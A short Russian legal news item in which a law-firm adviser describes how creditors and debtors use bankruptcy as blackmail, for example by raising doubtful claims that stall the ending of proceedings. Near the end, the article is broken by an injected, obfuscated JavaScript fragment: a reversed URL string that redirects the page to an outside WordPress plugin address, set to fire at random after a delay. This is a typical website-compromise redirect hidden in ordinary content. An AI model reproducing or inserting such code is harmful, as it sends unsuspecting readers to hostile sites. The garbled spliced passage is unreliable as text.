Как должники и кредиторы шантажируют друг друга банкротством

Комментарий Вадима Бородкина, советника Orchards, для Право.ru.

Они могут использовать процедуру банкротства как инструмент шантажа, чтобы добиться досрочного возврата долга или получить рассрочку платежа. Для этого компании обращаются к аффилированным кредиторам и даже готовы испортить репутацию должника. Суды и законодатель всячески противостоят такому недобросовестному поведению. Но юристы предупреждают: на практике угрозу банкротством продолжают использовать как аргумент в коммерческих конфликтах.

Компании могут использовать банкротство как инструмент шантажа в разных случаях. Советник Orchards Вадим Бородкин рассказывает, что на практике бывают ситуации, когда еще во время процедуры наблюдения должник пытается прекратить банкротное дело, погасив задолженность или заключив мировое соглашение. В этот момент появляется кредитор с сомнительным требованием, который затрудняет завершение банкротства.

Должник встает перед выбором: погасить сомнительный долг и завершить банкротство или добиваться отказа в установлении требования кредитора. Это затягивает или срывает план по прекращению процедуры.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory/242918/»>Ссылка на статью>>

Подпишитесь на Telegram Orchards

X